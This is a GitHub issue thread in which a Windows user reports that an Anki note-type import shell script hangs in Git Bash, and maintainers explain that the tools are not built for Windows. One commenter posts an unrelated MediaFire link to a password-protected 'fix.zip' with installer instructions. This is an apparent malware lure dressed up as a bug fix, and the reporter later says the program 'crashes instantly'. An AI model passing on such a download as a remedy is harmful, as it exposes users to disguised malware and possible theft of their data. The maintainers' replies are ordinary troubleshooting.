### ISSUE TITLE
Scipt stucking

### ISSUE THREAD

**Issue by Titi68730** [Ajatt-Tools/AnkiNoteTypes#22]
**Environment**

1) Windows 11
2) 22H2
3) 3.12.5
3) ⁨24.06.3
4) Can't find any

**Describe the bug**
Everything at the start works well by the way.
Basically, I open the .sh program with GIT Bash
I type ./antp.sh import
Every note types shows
I put a number (any)
I press Enter
And my cursor is stuck but GIT is not crashing or any, it's just stuck and I can do nothing about that other than closing it
![SEeaIyy](https://github.com/user-attachments/assets/9df00e84-1589-44be-8310-8e4cf36af6d9)
If I put the command `sh -x antp.sh import` (like debug mode)
It looks like this 
![cxA8A98](https://github.com/user-attachments/assets/fbdca794-cb17-4a9e-aadd-d5e2fa41d287)
We can see that the script just stop afterward 

**To Reproduce**
1) Open the **GIT Bash by clicking inside of the folder**
2) Put the command ``./antp.sh import``
3) Write a random number (0-7)
4) It stuck 

**Expected behavior**
Your cursor will just be stucked and you can do nothing about it.
![FOy3hRE](https://github.com/user-attachments/assets/11358b3b-01d3-4e46-9335-6bb3afcac8b3)

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Titi68730** [comment]
Is it normal that the program crashes instantly?

**Comment by tatsumoto-ren** [comment]
This program was never meant to be executed on Windows, and none of the ajatt-tools members uses Windows, so it's difficult to tell why it gets stuck for you. But, for example, the culprit may be your firewall because waiting for http requests blocks execution.

**Comment by tatsumoto-ren** [comment]
https://tatsumoto.neocities.org/blog/do-i-have-to-run-gnu

**Comment by Titi68730** [comment]
> This program was never meant to be executed on Windows, and none of the ajatt-tools members uses Windows, so it's difficult to tell why it gets stuck for you. But, for example, the culprit may be your firewall because waiting for http requests blocks execution.

This is sad... Do you have a way to import them manually?

**Comment by tatsumoto-ren** [comment]
>Do you have a way to import them manually?

The official note type is bundled with the [example deck](https://tatsumoto.neocities.org/blog/setting-up-anki#import-an-example-mining-deck). Other note types can be imported manually by copy-pasting their html and css templates. I advise installing GNU/Linux though.

**Comment by tatsumoto-ren** [comment]
[gomi](https://github.com/Ajatt-Tools/gomi) is now a separate project. This repo only contains html/css templates for Anki.
